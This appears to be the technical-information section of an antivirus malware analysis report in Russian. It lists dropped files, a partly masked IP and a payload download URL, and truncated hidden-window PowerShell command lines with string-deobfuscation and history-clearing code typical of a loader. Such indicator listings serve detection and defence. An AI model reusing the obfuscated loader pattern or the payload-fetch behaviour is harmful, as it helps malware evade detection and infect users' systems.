Техническая информация
- %APPDATA%\bit3504.tmp
- %APPDATA%\bit3504.tmp
- %APPDATA%\bit3504.tmp в %APPDATA%\kriminala.fre
- '85.##9.176.46':80
- http://85.##9.176.46/Spieli.lzh
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Clear-History;Clear-History;Function Unsubje ([String]$Pani){$Henrik = 5;For($Ethe=4; $Ethe -lt $Pani.Length-1; $Ethe+=$Henrik){ $Gennemfo4 = $Pani.Substring($Ethe, $Sandboyb130); $Gennemfo=$G...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Clear-History;Clear-History;Function Unsubje ([String]$Pani){$Henrik = 5;For($Ethe=4; $Ethe -lt $Pani.Length-1; $Ethe+=$Henrik){ $Gennemfo4 = $Pani.Substring($Ethe, $Sandboyb130); $Gennemfo=$G...
- '<SYSTEM32>\cmd.exe' /c "echo 1 && exit"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Clear-History;Clear-History;Function Unsubje ([String]$Pani){$Henrik = 5;For($Ethe=4; $Ethe -lt $Pani.Length-1; $Ethe+=$Henrik){ $Gennemfo4 = $Pani.Substring($Ethe, $Sandboyb130); $Gennemfo=$G...
- '%WINDIR%\syswow64\cmd.exe' /c "echo 1 && exit"